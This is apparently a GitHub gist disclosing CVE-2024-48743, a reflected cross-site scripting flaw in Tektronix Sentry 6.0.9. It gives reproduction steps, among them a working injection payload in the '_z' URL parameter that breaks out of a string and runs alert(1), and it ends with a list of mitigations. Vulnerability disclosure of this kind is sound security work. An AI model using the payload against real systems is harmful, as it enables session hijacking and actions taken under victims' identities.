Created
October 19, 2024 17:48
-
-
Save rvismit/538232c3f258e468195febb69f3f2d3b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Product : Tektronix Sentry | |
CVE : CVE-2024-48743 | |
Version : 6.0.9 | |
Vulnerability : Cross Site Scripting | |
Vulnerability Description : Cross Site Scripting (XSS)a security vulnerability that allows attackers to inject malicious code into a website or web application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data. | |
#Steps to Reproduce | |
1). Navigate to - http://IP/?page=reports&_z=0& | |
2). The "z" parameter is vulnerable remove "0" and insert the query "ysguo%27-alert(1)-%27jf151=1" | |
3). http://IP/?page=reports&_z=ysguo%27-alert(1)-%27jf151=1& | |
Mitigation: | |
1). Secure handling of user input | |
2). Escaping | |
3). Use appropriate response headers | |
4). Encode data on output |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment